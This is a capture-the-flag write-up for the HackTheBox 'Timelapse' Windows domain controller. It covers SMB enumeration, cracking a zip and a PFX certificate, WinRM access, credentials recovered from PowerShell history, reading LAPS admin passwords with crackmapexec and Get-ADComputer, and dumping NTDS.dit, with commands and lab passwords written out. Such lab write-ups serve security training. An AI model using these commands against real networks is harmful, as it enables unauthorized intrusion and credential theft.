CTF-Writeups/HackTheBox/Timelapse.md
2022-08-20 20:12:50 +05:00

9.5 KiB

HackTheBox-Timelapse

NMAP

PORT      STATE SERVICE       VERSION              
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version                                   
|_    bind                 
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-27 03:07:25Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3269/tcp  open  tcpwrapped   
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa 
| Public Key bits: 2048                                                
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after:  2022-10-25T14:25:29
| MD5:   e233 a199 4504 0859 013f b9c5 e4f6 91c3
|_SHA-1: 5861 acf7 76b8 703f d01e e25d fc7c 9952 a447 7652
|_ssl-date: 2022-03-27T03:10:27+00:00; +7h59m59s from scanner time.                                                                           
| tls-alpn:                                                            
|_  http/1.1                                                           
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
64463/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cg
i-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/27%Time=623F6471%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-03-27T03:09:54
|_  start_date: N/A

From the nmap results we have port 88 which is kerberos and whenever we see this service running on a windows machine it means that's a Domain Controllerso we are looking at Active Directory here and we also have the domain name as well which is dc01.timelapse.htb so let's add this in our /etc/hosts file

PORT 389 (LDAP)

Checking for null authentication on LDAP as it can sometimes give us the usernames but it failed

PORT 139/445 (SMB)

Having smb service running, we can check what shares this machine has using smbclient

Checking the Shares we have two folders here

In Dev folder we have winrm_backup.zip so let's download that

And in HelpDesk we have 3 document files regarding LAPS and an installer file for LAPS

LAPS here is Local Administrator Password Solution which randomizes administrator's password in the ad domain so that the administrator account's password isn't the same across the domain

The document files were related to installing LAPS on the DC so it was just about the documentation

When unzipping the archive from smb share it was asking for a password

So using fcrackzip we can brutefroce the password for this zip archive

fcrackzip -u -D -p /opt/SecLists/Passwords/rockyou.txt ./winrm_backup.zip

Here the parameters are:

  • -u, It will try to decompress the first file by calling unzip with the guessed password
  • -D, This will use dictionary mode, fcrackzip will read passwords from a file which must contain one password per line
  • -p, this is for specifying either a string or the wordlist

Foothold

After unzipping the archive we'll get a pfx (legacyy_dev_auth.pfx) file and it's a SSL certificate that contains both public and private keys which can be used for authentication that is protected by a password

I tried to read the certifiate with openssl and provided the same password that we got for the archive but it failed

We can try to crack the password hash for this pfx file by running pfx2john to get the hash then running johntheripper to crack it

And now we should be able to read the certificate

Reading the certificate we can see a user name Legacyy, this can be verified if it's actually a username on the machine by running kebrute to see if the user exists

Since port 5986 is open which is WinRM over SSL and we need to use a certificate to authenticate to winrm, evill-winrm doesn't have the option to use pfx certificate so I though maybe we need to extract the public and private key certificate from pfx as it does have option to specify them

And doing this, it worked

In C:\Users we see user svc_deploy and TRX

Privilege Escalation (svc_deploy)

As this is a AD box, we can try running bloodhound to enumerate the domain for potential paths for privilege escalation and other misconfigurations in the domain

But after uploading it and importing, it was blocked by AV, I tried it through IEX as well but it still didn't worked

Downloading sharphound.exe from here https://github.com/BloodHoundAD/SharpHound and running it worked

But when I uploaded the archive on bloodhound GUI it wasn't able to parse the files, so moving on I tried looking into the powershell history file and found the credentials for svc_deploy user

more .\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

So using the same commands for making a PSCredential object we can execute commands as svc_deploy

Checking in which groups this user belongs to and, this is a member of LAPS_Reader group

Privilege Escalation (Administrator)

I tried looking into ways to read LAPS password and since we can't import scripts I tried running sharplaps.exe but it was caught by AV

https://github.com/swisskyrepo/SharpLAPS/

So then I went through this article explaining how we can read LAPS password and it showed it through crackmapexec

https://www.hackingarticles.in/credential-dumpinglaps/

One thing to note that crackmapexec requires lsassy a python library in order to use cme's modules which wasn't on my distro so I had to install it

And after this the module for LASP worked and we got the password

cme ldap 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -M laps

Alternatively we can get the clear text password through AD-Module which already comes installed with LAPS, we can check if it's available through Get-Module -Name ActiveDirectory -ListAvailable and then import it with Import-Module -Name ActiveDirectory

I came across this post in configuring LAPS

https://adsecurity.org/?p=3164

So checking in which attribute we can find the clear text LAPS password

Get-ADComputer -Identity "dc01" -Properties "ms-mcs-AdmPwd"

Being an administrator on domain controller we can then dump hashes from NTDS.dit file

References

archive : supremelegacy
pfx : thuglegacy

`--CollectionMethod All --Domain timelapse.htb `

$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}